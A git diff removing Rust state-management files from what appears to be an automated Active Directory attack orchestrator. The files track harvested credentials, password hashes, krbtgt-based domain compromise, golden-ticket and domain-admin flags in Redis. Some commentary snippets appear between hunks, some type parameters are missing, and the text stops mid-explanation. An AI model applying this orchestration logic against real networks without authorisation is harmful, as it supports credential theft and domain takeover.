std::collections::HashMap<String, String> = - conn.hgetall(&completed_tasks_key).await.unwrap_or_default(); - let mut completed_tasks = std::collections::HashMap::new(); - for (task_id, json_str) in &raw_completed { - if let Ok(task_result) = serde_json::from_str::<crate::task_queue::TaskResult>(json_str) - { - completed_tasks.insert(task_id.clone(), task_result); - } - } - - // Load dispatched ACL steps from dedup set - let acl_dedup_key = format!( - "{}:{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DEDUP_PREFIX, - DEDUP_ACL_STEPS - ); - let dispatched_acl_steps: HashSet<String> = - conn.smembers(&acl_dedup_key).await.unwrap_or_default(); - - // Apply to state - let mut state = self.inner.write().await; - state.target = loaded.target; - state.target_ips = loaded.target_ips; - state.credentials = loaded.all_credentials; - state.hashes = loaded.all_hashes; - state.hosts = loaded.all_hosts; - state.users = loaded.all_users; - state.shares = loaded.all_shares; - state.domains = loaded.all_domains; - state.discovered_vulnerabilities = loaded.discovered_vulnerabilities; - state.exploited_vulnerabilities = loaded.exploited_vulnerabilities; - state.domain_controllers = loaded.domain_controllers; - state.netbios_to_fqdn = loaded.netbios_to_fqdn; - state.domain_sids = domain_sids; - state.admin_names = admin_names; - state.trusted_domains = trusted_domains; - // Rebuild dominated_domains from krbtgt hashes - state.dominated_domains = state - .hashes - .iter() - .filter(|h| { - h.username.to_lowercase() == "krbtgt" && h.hash_type.to_lowercase().contains("ntlm") - }) - .map(|h| { - if h.domain.is_empty() { - state.domains.first().cloned().unwrap_or_default() - } else { - h.domain.to_lowercase() - } - }) - .filter(|d| !d.is_empty()) - .collect(); - state.has_domain_admin = loaded.has_domain_admin; - state.has_golden_ticket = loaded.has_golden_ticket; - state.domain_admin_path = loaded.domain_admin_path; - state.dedup = dedup_sets; - state.mssql_enum_dispatched = mssql_dispatched; - state.acl_chains = acl_chains; - state.dispatched_acl_steps = dispatched_acl_steps; - state.pending_tasks = pending_tasks; - state.completed_tasks = completed_tasks; - - let cred_count = state.credentials.len(); - let hash_count = state.hashes.len(); - let host_count = state.hosts.len(); - let vuln_count = state.discovered_vulnerabilities.len(); - drop(state); - - info!( - operation_id = %operation_id, - credentials = cred_count, - hashes = hash_count, - hosts = host_count, - vulnerabilities = vuln_count, - "State loaded from Redis" - ); - - Ok(()) - } - - /// Refresh state from Redis (periodic sync).
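///
/// Unlike `load_from_redis`, this re-reads only the hot collections
/// (credentials, hashes, hosts, vulnerabilities, DC map, SIDs, trusts, ACL
/// chains) and recomputes `dominated_domains`; dedup sets and task maps are
/// loaded once at startup.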
- pub async fn refresh_from_redis(&self, queue: &TaskQueue) -> Result<()> { - let mut conn = queue.connection(); - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id.clone()); - - let credentials = reader.get_credentials(&mut conn).await.unwrap_or_default(); - let hashes = reader.get_hashes(&mut conn).await.unwrap_or_default(); - let hosts = reader.get_hosts(&mut conn).await.unwrap_or_default(); - let vulns = reader - .get_vulnerabilities(&mut conn) - .await - .unwrap_or_default(); - let exploited = reader - .get_exploited_vulnerabilities(&mut conn) - .await - .unwrap_or_default(); - let meta = reader.get_meta(&mut conn).await.unwrap_or_default(); - let dc_map = reader.get_dc_map(&mut conn).await.unwrap_or_default(); - - // Load domain SIDs - let domain_sids_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DOMAIN_SIDS - ); - let domain_sids: HashMap<String, String> = - conn.hgetall(&domain_sids_key).await.unwrap_or_default(); - - // Load RID-500 admin account names - let admin_names_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_ADMIN_NAMES - ); - let admin_names: HashMap<String, String> = - conn.hgetall(&admin_names_key).await.unwrap_or_default(); - - // Refresh ACL chains - let acl_chains_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_ACL_CHAINS - ); - let acl_chains_raw: Vec<String> = conn - .lrange(&acl_chains_key, 0, -1) - .await - .unwrap_or_default(); - let acl_chains: Vec<serde_json::Value> = acl_chains_raw - .iter() - .filter_map(|s| serde_json::from_str(s).ok()) - .collect(); - - // Refresh trusted domains - let trusted_domains_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_TRUSTED_DOMAINS - ); - let raw_trusts: HashMap<String, String> = - conn.hgetall(&trusted_domains_key).await.unwrap_or_default(); - let mut trusted_domains = HashMap::new(); - for (domain, json_str) in &raw_trusts { - if let Ok(trust) = serde_json::from_str::<ares_core::models::TrustInfo>(json_str) { - trusted_domains.insert(domain.clone(), trust); - } - } - - let mut state = self.inner.write().await; - state.credentials = credentials; - state.hashes = hashes; - state.hosts = hosts; - state.discovered_vulnerabilities = vulns; - state.exploited_vulnerabilities = exploited; - state.has_domain_admin = meta.has_domain_admin; - state.has_golden_ticket = meta.has_golden_ticket; - state.domain_admin_path = meta.domain_admin_path; - state.domain_controllers = dc_map; - state.domain_sids = domain_sids; - state.admin_names = admin_names; - state.trusted_domains = trusted_domains; - state.acl_chains = acl_chains; - // Rebuild dominated_domains from refreshed hashes - state.dominated_domains = state - .hashes - .iter() - .filter(|h| { - h.username.to_lowercase() == "krbtgt" && h.hash_type.to_lowercase().contains("ntlm") - }) - .map(|h| { - if h.domain.is_empty() { - state.domains.first().cloned().unwrap_or_default() - } else { - h.domain.to_lowercase() - } - }) - .filter(|d| !d.is_empty()) - .collect(); - - Ok(()) - } -} diff --git a/ares-orchestrator/src/state/publishing/credentials.rs b/ares-orchestrator/src/state/publishing/credentials.rs deleted file mode 100644 index 53cc8ce2..00000000 --- a/ares-orchestrator/src/state/publishing/credentials.rs +++ /dev/null @@ -1,221 +0,0 @@ -//! Credential and hash publishing methods.
- -use anyhow::Result; - -use ares_core::models::{Credential, Hash}; -use ares_core::state::{self, RedisStateReader}; - -use crate::state::SharedState; -use crate::task_queue::TaskQueue; - -use super::sanitize_credential; - -impl SharedState { - /// Add a credential to state and Redis (with dedup). - /// - /// Sanitizes the credential before storage (strips "Password:" prefix, trailing - /// metadata, normalizes domains, rejects noise). When the credential's domain is - /// a valid FQDN (contains a dot), it is automatically added to `state.domains` - /// (matches Python's `add_credential()` behavior). - pub async fn publish_credential(&self, queue: &TaskQueue, cred: Credential) -> Result<bool> { - // Sanitize and validate before storage - let netbios_map = { - let state = self.inner.read().await; - state.netbios_to_fqdn.clone() - }; - let cred = match sanitize_credential(cred, &netbios_map) { - Some(c) => c, - None => return Ok(false), - }; - - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id.clone()); - let mut conn = queue.connection(); - let added = reader.add_credential(&mut conn, &cred).await?; - if added { - // Auto-extract domain from credential (matches Python add_credential) - let cred_domain = cred.domain.to_lowercase(); - if cred_domain.contains('.') { - let mut state = self.inner.write().await; - if !state.domains.contains(&cred_domain) { - state.domains.push(cred_domain.clone()); - let domain_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DOMAINS, - ); - let _: Result<(), _> = - redis::AsyncCommands::sadd(&mut conn, &domain_key, &cred_domain).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - tracing::info!( - domain = %cred_domain, - username = %cred.username, - "Auto-extracted domain from credential" - ); - } - state.credentials.push(cred); - } else { - let mut state = self.inner.write().await; - state.credentials.push(cred); - } - } - Ok(added) - } - - /// Add a hash to state and Redis (with dedup). - /// - /// When a `krbtgt` NTLM hash is stored, `has_domain_admin` is automatically - /// set — mirroring Python's `add_hash()` behaviour so that `auto_golden_ticket` - /// triggers without requiring the LLM to emit a structured JSON payload.
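///
/// Illustrative flow (doc sketch added for clarity; values hypothetical):
///
/// ```ignore
/// // A secretsdump result yields the krbtgt NTLM hash for contoso.local.
/// let added = state.publish_hash(&queue, krbtgt_hash).await?;
/// // Side effects: "contoso.local" joins dominated_domains, has_domain_admin
/// // is set, and a synthetic "dc_secretsdump_contoso.local" vulnerability is
/// // published and immediately marked exploited.
/// ```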
- pub async fn publish_hash(&self, queue: &TaskQueue, hash: Hash) -> Result<bool> { - use ares_core::models::VulnerabilityInfo; - use std::collections::HashMap; - - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - let added = reader.add_hash(&mut conn, &hash).await?; - if added { - let is_krbtgt = hash.username.to_lowercase() == "krbtgt" - && hash.hash_type.to_lowercase().contains("ntlm"); - let hash_domain = hash.domain.clone(); - let mut state = self.inner.write().await; - state.hashes.push(hash); - - // Track per-domain domination when krbtgt NTLM hash arrives - if is_krbtgt { - let krbtgt_domain = if hash_domain.is_empty() { - state.domains.first().cloned().unwrap_or_default() - } else { - hash_domain.to_lowercase() - }; - if !krbtgt_domain.is_empty() { - state.dominated_domains.insert(krbtgt_domain.clone()); - tracing::info!(domain = %krbtgt_domain, "Domain dominated (krbtgt hash obtained)"); - } - - // Resolve DC target IP for vulnerability entry - let dc_target = state - .domain_controllers - .get(&krbtgt_domain) - .cloned() - .unwrap_or_else(|| krbtgt_domain.clone()); - - // Auto-set domain admin when first krbtgt NTLM hash arrives (matches Python) - if !state.has_domain_admin { - drop(state); - let path = Some("secretsdump → krbtgt NTLM hash".to_string()); - if let Err(e) = self.set_domain_admin(queue, path).await { - tracing::warn!(err = %e, "Failed to auto-set domain admin from krbtgt hash"); - } else { - tracing::info!( - "🎯 Domain Admin auto-set from krbtgt NTLM hash in publish_hash" - ); - } - } else { - drop(state); - } - - // Synthesize a dc_secretsdump vulnerability so the discovered - // vulnerabilities list reflects the DA achievement path. - let vuln_id = format!("dc_secretsdump_{}", krbtgt_domain); - let mut details = HashMap::new(); - details.insert( - "domain".into(), - serde_json::Value::String(krbtgt_domain.clone()), - ); - details.insert( - "note".into(), - serde_json::Value::String( - "Domain controller compromised via secretsdump — krbtgt NTLM hash extracted" - .to_string(), - ), - ); - let vuln = VulnerabilityInfo { - vuln_id: vuln_id.clone(), - vuln_type: "dc_secretsdump".to_string(), - target: dc_target, - discovered_by: "credential_access".to_string(), - discovered_at: chrono::Utc::now(), - details, - recommended_agent: String::new(), - priority: 1, - }; - let _ = self.publish_vulnerability(queue, vuln).await; - let _ = self.mark_exploited(queue, &vuln_id).await; - } - } - Ok(added) - } - - /// Update a hash's `cracked_password` field in memory and Redis. - /// - /// Finds the first hash matching the given username and domain (case-insensitive) - /// that has no cracked password yet, sets it, and persists the change to the Redis - /// HASH by scanning fields and updating the matching entry.
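///
/// ```ignore
/// // Sketch (doc example added for clarity; values hypothetical).
/// let updated = state
///     .update_hash_cracked_password(&queue, "jdoe", "contoso.local", "Summer2024!")
///     .await?;
/// assert!(updated); // first un-cracked jdoe@contoso.local hash now carries it
/// ```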
- pub async fn update_hash_cracked_password( - &self, - queue: &TaskQueue, - username: &str, - domain: &str, - password: &str, - ) -> Result { - // Update in-memory state and capture the updated hash for Redis persist - let (op_id, hash_type) = { - let mut state = self.inner.write().await; - let idx = state.hashes.iter().position(|h| { - h.username.eq_ignore_ascii_case(username) - && h.domain.eq_ignore_ascii_case(domain) - && h.cracked_password.is_none() - }); - match idx { - Some(i) => { - state.hashes[i].cracked_password = Some(password.to_string()); - let ht = state.hashes[i].hash_type.clone(); - (state.operation_id.clone(), ht) - } - None => return Ok(false), - } - }; - - // Persist to Redis HASH: scan fields, find the matching entry, update it - let hash_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_HASHES,); - let mut conn = queue.connection(); - let entries: std::collections::HashMap = - redis::AsyncCommands::hgetall(&mut conn, &hash_key) - .await - .unwrap_or_default(); - for (field, value) in &entries { - if let Ok(mut h) = serde_json::from_str::(value) { - if h.username.eq_ignore_ascii_case(username) - && h.domain.eq_ignore_ascii_case(domain) - && h.cracked_password.is_none() - { - h.cracked_password = Some(password.to_string()); - let updated_json = serde_json::to_string(&h).unwrap_or_default(); - let _: Result<(), _> = - redis::AsyncCommands::hset(&mut conn, &hash_key, field, &updated_json) - .await; - break; - } - } - } - - tracing::info!( - username = %username, - domain = %domain, - hash_type = %hash_type, - "Hash cracked_password updated in state and Redis" - ); - - Ok(true) - } -} diff --git a/ares-orchestrator/src/state/publishing/entities.rs b/ares-orchestrator/src/state/publishing/entities.rs deleted file mode 100644 index 6c071b8a..00000000 --- a/ares-orchestrator/src/state/publishing/entities.rs +++ /dev/null @@ -1,252 +0,0 @@ -//! Entity publishing: users, vulnerabilities, shares, timeline, tasks, netbios, trusts. - -use anyhow::Result; -use redis::AsyncCommands; - -use ares_core::models::{Share, User, VulnerabilityInfo}; -use ares_core::state::{self, RedisStateReader}; - -use crate::state::{SharedState, KEY_VULN_QUEUE}; -use crate::task_queue::TaskQueue; - -impl SharedState { - /// Add a user to state and Redis (with dedup). - pub async fn publish_user(&self, queue: &TaskQueue, user: User) -> Result { - // Check for duplicate in memory - { - let state = self.inner.read().await; - let dedup = format!( - "{}@{}", - user.username.to_lowercase(), - user.domain.to_lowercase() - ); - if state.users.iter().any(|u| { - format!("{}@{}", u.username.to_lowercase(), u.domain.to_lowercase()) == dedup - }) { - return Ok(false); - } - } - - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - let added = reader.add_user(&mut conn, &user).await?; - if added { - let mut state = self.inner.write().await; - state.users.push(user); - } - Ok(added) - } - - /// Add a vulnerability to state and Redis. 
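The Redis persistence step in `update_hash_cracked_password` is a scan-and-update over a HASH: fetch all fields, inspect each value, patch the first match, and write it back under the same field. A std-only sketch of that pattern, with plain strings standing in for the serialized `Hash` entries and the serde/Redis round-trip elided:

use std::collections::HashMap;

/// Patch the first entry matching `needle`, returning the field the caller
/// would HSET back — mirrors the scan loop above, minus Redis and serde.
fn patch_first(entries: &mut HashMap<String, String>, needle: &str, cracked: &str) -> Option<String> {
    for (field, value) in entries.iter_mut() {
        if value.contains(needle) && !value.contains("cracked=") {
            value.push_str(&format!(";cracked={cracked}"));
            return Some(field.clone());
        }
    }
    None
}

fn main() {
    let mut m = HashMap::from([("h1".to_string(), "user=admin".to_string())]);
    assert_eq!(patch_first(&mut m, "admin", "hunter2"), Some("h1".to_string()));
}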
- pub async fn publish_vulnerability( - &self, - queue: &TaskQueue, - vuln: VulnerabilityInfo, - ) -> Result { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id.clone()); - let mut conn = queue.connection(); - let added = reader.add_vulnerability(&mut conn, &vuln).await?; - if added { - // Also add to vuln queue ZSET for exploitation workflow - let vuln_queue_key = - format!("{}:{}:{}", state::KEY_PREFIX, operation_id, KEY_VULN_QUEUE); - let vuln_json = serde_json::to_string(&vuln).unwrap_or_default(); - let score = vuln.priority as f64; - let _: () = conn - .zadd(&vuln_queue_key, &vuln_json, score) - .await - .unwrap_or(()); - let _: () = conn.expire(&vuln_queue_key, 86400).await.unwrap_or(()); - - let mut state = self.inner.write().await; - state - .discovered_vulnerabilities - .insert(vuln.vuln_id.clone(), vuln); - } - Ok(added) - } - - /// Add a share to state and Redis (with dedup). - pub async fn publish_share(&self, queue: &TaskQueue, share: Share) -> Result { - // Check for duplicate in memory - { - let state = self.inner.read().await; - if state.shares.iter().any(|s| { - s.host.to_lowercase() == share.host.to_lowercase() - && s.name.to_lowercase() == share.name.to_lowercase() - }) { - return Ok(false); - } - } - - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - let added = reader.add_share(&mut conn, &share).await?; - if added { - let mut state = self.inner.write().await; - state.shares.push(share); - } - Ok(added) - } - - /// Persist a timeline event to Redis and add MITRE techniques. - pub async fn persist_timeline_event( - &self, - queue: &TaskQueue, - event: &serde_json::Value, - mitre_techniques: &[String], - ) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - - reader.add_timeline_event(&mut conn, event).await?; - - for technique in mitre_techniques { - let _ = reader.add_technique(&mut conn, technique).await; - } - - Ok(()) - } - - /// Record a pending task in memory and persist to Redis HASH. - /// - /// Key: `ares:op:{id}:pending_tasks` — matches Python's state_backend. - pub async fn track_pending_task( - &self, - queue: &TaskQueue, - task: ares_core::models::TaskInfo, - ) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let task_id = task.task_id.clone(); - let json = serde_json::to_string(&task).unwrap_or_default(); - - // Persist to Redis - let key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_PENDING_TASKS, - ); - let mut conn = queue.connection(); - let _: Result<(), _> = redis::AsyncCommands::hset(&mut conn, &key, &task_id, &json).await; - let _: Result<(), _> = redis::AsyncCommands::expire(&mut conn, &key, 86400i64).await; - - // Update in-memory state - let mut state = self.inner.write().await; - state.pending_tasks.insert(task_id, task); - Ok(()) - } - - /// Move a task from pending to completed, persisting both changes to Redis. 
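`publish_vulnerability` queues work in a ZSET scored by priority, so lower scores surface first. The same ordering modeled with a `BinaryHeap` (a std stand-in for ZADD plus lowest-score-first consumption; the real code uses the redis crate and ZSET commands):

use std::cmp::Reverse;
use std::collections::BinaryHeap;

fn main() {
    // (priority, vuln_id): lower score = more urgent, popped first,
    // matching ZADD with priority-as-score on the vuln queue above.
    let mut queue = BinaryHeap::new();
    queue.push(Reverse((3u32, "esc1_ca01")));
    queue.push(Reverse((1u32, "dc_secretsdump_contoso.local")));
    let Reverse((score, id)) = queue.pop().unwrap();
    assert_eq!((score, id), (1, "dc_secretsdump_contoso.local"));
}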
- /// - /// Keys: `ares:op:{id}:pending_tasks`, `ares:op:{id}:completed_tasks` - pub async fn complete_task( - &self, - queue: &TaskQueue, - task_id: &str, - result: ares_core::models::TaskResult, - ) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let result_json = serde_json::to_string(&result).unwrap_or_default(); - - let pending_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_PENDING_TASKS, - ); - let completed_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_COMPLETED_TASKS, - ); - - let mut conn = queue.connection(); - // Remove from pending, add to completed - let _: Result<(), _> = redis::AsyncCommands::hdel(&mut conn, &pending_key, task_id).await; - let _: Result<(), _> = - redis::AsyncCommands::hset(&mut conn, &completed_key, task_id, &result_json).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &completed_key, 86400i64).await; - - // Update in-memory state - let mut state = self.inner.write().await; - state.pending_tasks.remove(task_id); - state.completed_tasks.insert(task_id.to_string(), result); - Ok(()) - } - - /// Persist a NetBIOS to FQDN mapping to Redis HASH. - /// - /// Key: `ares:op:{id}:netbios_map` — matches Python's `HSET` on netbios_map. - pub async fn publish_netbios( - &self, - queue: &TaskQueue, - netbios: &str, - fqdn: &str, - ) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_NETBIOS_MAP, - ); - let mut conn = queue.connection(); - let _: () = redis::AsyncCommands::hset(&mut conn, &key, netbios, fqdn).await?; - let _: () = redis::AsyncCommands::expire(&mut conn, &key, 86400i64).await?; - - let mut state = self.inner.write().await; - state - .netbios_to_fqdn - .insert(netbios.to_string(), fqdn.to_string()); - Ok(()) - } - - /// Add a trust relationship to state and Redis. - pub async fn publish_trust_info( - &self, - queue: &TaskQueue, - trust: ares_core::models::TrustInfo, - ) -> Result { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - let added = reader.add_trusted_domain(&mut conn, &trust).await?; - if added { - let domain_key = trust.domain.to_lowercase(); - let mut state = self.inner.write().await; - state.trusted_domains.insert(domain_key, trust); - } - Ok(added) - } -} diff --git a/ares-orchestrator/src/state/publishing/hosts.rs b/ares-orchestrator/src/state/publishing/hosts.rs deleted file mode 100644 index de94dbe8..00000000 --- a/ares-orchestrator/src/state/publishing/hosts.rs +++ /dev/null @@ -1,342 +0,0 @@ -//! Host and domain controller publishing methods. - -use anyhow::Result; -use redis::AsyncCommands; - -use ares_core::models::Host; -use ares_core::state::{self, RedisStateReader}; - -use crate::state::SharedState; -use crate::task_queue::TaskQueue; - -use super::is_aws_hostname; - -impl SharedState { - /// Add a host to state and Redis. - /// - /// Merges data when a host with the same IP already exists: upgrades DC - /// status, fills in hostname, and keeps the richer service list. - /// AWS internal hostnames (e.g. `ip-10-1-2-150.us-west-2.compute.internal`) - /// are stripped to allow real AD FQDNs to take precedence. - /// - /// When the hostname is a valid AD FQDN (e.g. 
`dc01.contoso.local`), the - /// domain suffix is automatically extracted and added to `state.domains` - /// (matches Python's `add_host()` behavior). - pub async fn publish_host(&self, queue: &TaskQueue, host: Host) -> Result { - // Normalize hostname: strip trailing dots and AWS internal names - let mut host = host; - host.hostname = host.hostname.trim_end_matches('.').to_lowercase(); - if is_aws_hostname(&host.hostname) { - host.hostname = String::new(); - } - - // Auto-extract domain from FQDN hostname (matches Python add_host) - // e.g. "dc02.child.contoso.local" → "child.contoso.local" - if !host.hostname.is_empty() - && host.hostname.contains('.') - && !is_aws_hostname(&host.hostname) - { - let hostname_clean = host.hostname.trim_end_matches('.'); - let parts: Vec<&str> = hostname_clean.split('.').collect(); - if parts.len() >= 3 { - let domain = parts[1..].join(".").to_lowercase(); - // Reject AWS/cloud domains - if !domain.contains("compute.internal") && !domain.contains("amazonaws.com") { - let op_id = self.inner.read().await.operation_id.clone(); - let mut state = self.inner.write().await; - if !state.domains.contains(&domain) { - state.domains.push(domain.clone()); - let domain_key = - format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS,); - let mut conn = queue.connection(); - let _: Result<(), _> = - redis::AsyncCommands::sadd(&mut conn, &domain_key, &domain).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - tracing::info!( - hostname = %host.hostname, - domain = %domain, - "Auto-extracted domain from host FQDN" - ); - } - } - - // Auto-populate netbios_to_fqdn map so CLI can resolve short names. - // e.g. "dc02.child.contoso.local" → DC02 → dc02.child.contoso.local - let short_name = parts[0].to_uppercase(); - let fqdn = host.hostname.to_lowercase(); - let _ = self.publish_netbios(queue, &short_name, &fqdn).await; - } - } - - // Check for existing host with same IP or hostname and merge if the - // new entry brings richer data (DC detection, more services, hostname). - // Returns (needs_dc_registration, was_merged_and_changed). 
- let (needs_dc_registration, merged_changed) = { - let mut state = self.inner.write().await; - // Look up by IP first, then fall back to hostname match - let existing_idx = state - .hosts - .iter() - .position(|h| !h.ip.is_empty() && h.ip == host.ip) - .or_else(|| { - if !host.hostname.is_empty() { - state.hosts.iter().position(|h| { - !h.hostname.is_empty() - && h.hostname.eq_ignore_ascii_case(&host.hostname) - }) - } else { - None - } - }); - if let Some(existing) = existing_idx.map(|i| &mut state.hosts[i]) { - // Merge IP if incoming has one and existing doesn't - if !host.ip.is_empty() && existing.ip.is_empty() { - existing.ip = host.ip.clone(); - } - let new_is_dc = host.is_dc || host.detect_dc(); - let was_dc = existing.is_dc; - let had_hostname = !existing.hostname.is_empty(); - let mut changed = false; - - if new_is_dc && !existing.is_dc { - existing.is_dc = true; - changed = true; - } - // Strip AWS hostname from existing entry too - if is_aws_hostname(&existing.hostname) { - existing.hostname = String::new(); - changed = true; - } - if !host.hostname.is_empty() && existing.hostname.is_empty() { - existing.hostname = host.hostname.clone(); - changed = true; - } - for svc in &host.services { - if !existing.services.contains(svc) { - existing.services.push(svc.clone()); - changed = true; - } - } - if !host.os.is_empty() && existing.os.is_empty() { - existing.os = host.os.clone(); - changed = true; - } - if !host.roles.is_empty() && existing.roles.is_empty() { - existing.roles = host.roles.clone(); - changed = true; - } - - if !changed { - return Ok(false); - } - - // Re-register DC if it just became a DC, or if its hostname - // was just filled in (so we can correct the domain mapping). - let is_dc_now = existing.is_dc; - let has_hostname_now = !existing.hostname.is_empty(); - let needs_dc = - (is_dc_now && !was_dc) || (is_dc_now && has_hostname_now && !had_hostname); - (needs_dc, true) - } else { - // No existing host — will be added below - (false, false) - } - }; - - // Register netbios mapping for merged host if hostname was updated - if merged_changed { - let state = self.inner.read().await; - if let Some(merged) = state.hosts.iter().find(|h| h.ip == host.ip) { - if merged.hostname.contains('.') { - let parts: Vec<&str> = merged.hostname.split('.').collect(); - if parts.len() >= 3 { - let short = parts[0].to_uppercase(); - let fqdn = merged.hostname.to_lowercase(); - drop(state); - let _ = self.publish_netbios(queue, &short, &fqdn).await; - } - } - } - } - - // Persist merged host to Redis LIST (find-by-IP and LSET). 
- if merged_changed { - let state = self.inner.read().await; - if let Some(merged) = state.hosts.iter().find(|h| h.ip == host.ip) { - let op_id = &state.operation_id; - let host_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_HOSTS,); - let merged_json = serde_json::to_string(merged).unwrap_or_default(); - let mut conn = queue.connection(); - // Scan the Redis LIST to find the index matching this IP - let entries: Vec = - redis::AsyncCommands::lrange(&mut conn, &host_key, 0, -1) - .await - .unwrap_or_default(); - for (idx, entry) in entries.iter().enumerate() { - if let Ok(h) = serde_json::from_str::(entry) { - if h.ip == host.ip { - let _: Result<(), _> = redis::AsyncCommands::lset( - &mut conn, - &host_key, - idx as isize, - &merged_json, - ) - .await; - break; - } - } - } - } - } - - // If we merged into an existing host and it became/updated as DC, register it - if needs_dc_registration { - let host_snapshot = { - let state = self.inner.read().await; - state - .hosts - .iter() - .find(|h| h.ip == host.ip) - .cloned() - .unwrap() - }; - self.register_dc(queue, &host_snapshot).await?; - return Ok(true); - } - - // If the host already existed (was merged), we're done - { - let state = self.inner.read().await; - if state.hosts.iter().any(|h| h.ip == host.ip) { - return Ok(true); - } - } - - // New host — add to Redis and state - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - reader.add_host(&mut conn, &host).await?; - - // Update DC map and domain list if this is a domain controller - if host.is_dc || host.detect_dc() { - self.register_dc(queue, &host).await?; - let mut state = self.inner.write().await; - state.hosts.push(host); - return Ok(true); - } - - let mut state = self.inner.write().await; - state.hosts.push(host); - Ok(true) - } - - /// Register a host as a domain controller: update DC map and domain list. - /// - /// Domain is derived from the FQDN hostname (e.g. `dc01.contoso.local` → `contoso.local`). - /// If the hostname is empty or not a valid AD FQDN, we fall back to the first domain - /// already in state (from the target_domain config). This ensures DCs discovered by - /// recon are registered even before their FQDN is known. - pub(crate) async fn register_dc(&self, queue: &TaskQueue, host: &Host) -> Result<()> { - // Extract domain from hostname — prefer a real FQDN - let raw_domain = if !host.hostname.is_empty() { - host.hostname - .split('.') - .skip(1) - .collect::>() - .join(".") - } else { - String::new() - }; - - // If we can't derive a domain from the hostname, fall back to the - // target domain already in state. This unblocks automation for DCs - // discovered before their FQDN is resolved. 
- let raw_domain = if raw_domain.is_empty() - || raw_domain.contains("compute.internal") - || raw_domain.contains("amazonaws.com") - { - let state = self.inner.read().await; - if let Some(fallback) = state.domains.first().cloned() { - tracing::info!( - ip = %host.ip, - hostname = %host.hostname, - fallback_domain = %fallback, - "DC registration: using fallback domain (no FQDN available)" - ); - fallback - } else { - tracing::debug!( - ip = %host.ip, - hostname = %host.hostname, - "Skipping DC registration: no FQDN and no fallback domain in state" - ); - return Ok(()); - } - } else { - raw_domain - }; - - let domain = raw_domain; - let domain_lower = domain.to_lowercase(); - - let mut conn = queue.connection(); - let op_id = self.inner.read().await.operation_id.clone(); - let dc_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DC_MAP); - - // Remove any stale mapping that pointed this IP to a different domain - { - let state = self.inner.read().await; - let stale_domains: Vec = state - .domain_controllers - .iter() - .filter(|(d, ip)| *ip == &host.ip && **d != domain_lower) - .map(|(d, _)| d.clone()) - .collect(); - for stale in &stale_domains { - tracing::info!( - ip = %host.ip, - old_domain = %stale, - new_domain = %domain_lower, - "Correcting DC domain mapping" - ); - let _: () = conn.hdel(&dc_key, stale).await?; - } - // Remove stale entries from state (done below under write lock) - } - - let _: () = conn.hset(&dc_key, &domain_lower, &host.ip).await?; - - // Add domain to state and Redis, correct stale mappings - let mut state = self.inner.write().await; - - // Remove stale domain → IP mappings for this IP - state - .domain_controllers - .retain(|d, ip| !(ip == &host.ip && *d != domain_lower)); - - // Insert or update the mapping - state - .domain_controllers - .insert(domain_lower.clone(), host.ip.clone()); - - if !state.domains.contains(&domain_lower) { - state.domains.push(domain_lower.clone()); - let domain_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS); - let _: () = conn.sadd(&domain_key, &domain_lower).await?; - let _: () = conn.expire(&domain_key, 86400).await?; - } - - tracing::info!( - ip = %host.ip, - domain = %domain_lower, - "Registered domain controller" - ); - - Ok(()) - } -} diff --git a/ares-orchestrator/src/state/publishing/milestones.rs b/ares-orchestrator/src/state/publishing/milestones.rs deleted file mode 100644 index 8d90c034..00000000 --- a/ares-orchestrator/src/state/publishing/milestones.rs +++ /dev/null @@ -1,156 +0,0 @@ -//! Milestone publishing: golden ticket, domain admin. - -use std::collections::HashMap; - -use anyhow::Result; - -use ares_core::models::VulnerabilityInfo; -use ares_core::state::RedisStateReader; - -use crate::state::SharedState; -use crate::task_queue::TaskQueue; - -impl SharedState { - /// Set has_golden_ticket flag and persist to Redis. 
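`register_dc` derives the domain by dropping the host label from the FQDN, rejecting AWS internal names, and falling back to the first known domain when nothing usable remains. A condensed sketch of that derivation (the fallback lookup into `state.domains` is left to the caller):

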